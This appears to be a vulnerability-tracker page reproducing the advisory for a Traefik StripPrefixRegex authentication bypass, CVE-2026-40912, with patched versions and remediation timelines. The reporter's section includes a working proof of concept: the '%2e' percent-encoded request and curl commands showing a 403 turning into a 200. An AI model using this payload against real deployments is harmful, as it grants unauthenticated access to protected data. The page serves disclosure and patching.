Traefik CVE-2026-40912
HIGHLifecycle Timeline
1DescriptionNVD
Summary
There is a high severity authentication bypass vulnerability in Traefik's StripPrefixRegex middleware when used in combination with ForwardAuth, BasicAuth, or DigestAuth.
The middleware matches the regex against the decoded URL path but uses the resulting byte length to slice the percent-encoded raw path. When a dot (or multiple dots) appears in the prefix portion of the URL, the raw path after stripping becomes a dot-segment (e.g. /./admin/secret).
ForwardAuth receives this dot-segment path in X-Forwarded-Uri, which does not match the protected path patterns and therefore allows the request through. The backend then normalizes the dot-segment to the real path per RFC 3986 and serves the protected content
An unauthenticated attacker can exploit this against any backend that performs dot-segment normalization.
Patches
- https://github.com/traefik/traefik/releases/tag/v2.11.43
- https://github.com/traefik/traefik/releases/tag/v3.6.14
- https://github.com/traefik/traefik/releases/tag/v3.7.0-rc.2
For more information
If there are any questions or comments about this advisory, please open an issue.
<details> <summary>Original Description</summary>
Summary
StripPrefixRegex uses the byte length of a decoded Path match to slice the encoded RawPath. When percent-encoded characters are in the prefix region, this produces a wrong RawPath. ForwardAuth then receives this wrong path in X-Forwarded-Uri, sees a path that doesn't match its protection rules, and approves the request. The backend serves protected content.
Details
pkg/middlewares/stripprefixregex/strip_prefix_regex.go, line 62:
req.URL.RawPath = ensureLeadingSlash(req.URL.RawPath[len(prefix):])prefix comes from matching the regex against the decoded req.URL.Path (line 51). len(prefix) is then used to index into the encoded req.URL.RawPath. These lengths don't match when percent-encoding is present.
Example with regex ^/api:
- GET /api%20/admin/secret
- Decoded Path: /api /admin/secret -> prefix = /api (4 bytes)
- Encoded RawPath: /api%20/admin/secret -> same region is 6 bytes
- RawPath[4:] = %20/admin/secret -> after ensureLeadingSlash -> /%20/admin/secret
- ForwardAuth sees X-Forwarded-Uri: /%20/admin/secret -> not /admin/* -> allows it
- Backend serves the protected admin content
PoC
Requires Docker and Docker Compose. I have a setup that runs Traefik v3.6.11 with StripPrefixRegex + ForwardAuth + a backend. It sends a normal request (blocked, 403) and an encoded request (bypasses auth, 200, returns protected data). Can share the files here if useful.
Impact
Auth bypass. Any path protected by ForwardAuth, BasicAuth, or DigestAuth can be accessed without credentials when StripPrefixRegex is in the same middleware chain. The attacker only needs to add a percent-encoded character to the prefix portion of the URL.
---
Updated PoC (reporter follow-up)
After further testing, the confirmed working exploit uses %2e (percent-encoded dot) rather than %20. Dot-segment normalization (/./ -> /) is RFC 3986 standard behavior handled automatically by Express.js, Go's http.ServeMux, Spring Boot, and others - no custom configuration needed.
Chain:
GET /api%2e/admin/secret
-> StripPrefixRegex strips /api -> RawPath becomes /./admin/secret
-> ForwardAuth sees /./admin/secret -> does not match /admin/ -> allows
-> Express normalizes /./admin/secret -> /admin/secret -> serves protected contentResults (Traefik v3.6, unmodified Express.js express.static):
GET /api/admin/secret -> 403 (blocked)
GET /api%2e/admin/secret -> 200 (bypass - served protected content)
GET /api%20/admin/secret -> 404 (space not normalized by backend)Auth server logs:
X-Forwarded-Uri: '/admin/secret' -> DENIED
X-Forwarded-Uri: '/./admin/secret' -> ALLOWEDReproduction:
docker compose up -d --build --wait
curl http://localhost:8080/api/admin/secret
# -> 403
curl --path-as-is "http://localhost:8080/api%2e/admin/secret"
# -> 200</details>
---
AnalysisAI
Authentication bypass in Traefik's StripPrefixRegex middleware allows unauthenticated remote attackers to access protected resources when combined with ForwardAuth, BasicAuth, or DigestAuth. By inserting a percent-encoded dot (%2e) in the URL prefix, attackers exploit a length mismatch between decoded path matching and encoded path slicing, causing ForwardAuth to receive a dot-segment path (/./admin/secret) that bypasses protection rules while backend servers normalize it to the protected path (/admin/secret). …
Sign in for full analysis, threat intelligence, and remediation guidance.
RemediationAI
Within 24 hours: Inventory all Traefik deployments and identify versions in use; determine which instances use StripPrefixRegex combined with ForwardAuth, BasicAuth, or DigestAuth. Within 7 days: Upgrade affected Traefik instances to patched versions (v2.11.43 or later for v2.x, v3.6.14 or later for v3.x, v3.7.0-rc.2 or later for v3.7). …
Sign in for detailed remediation steps.
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-6jwx-7vp4-9847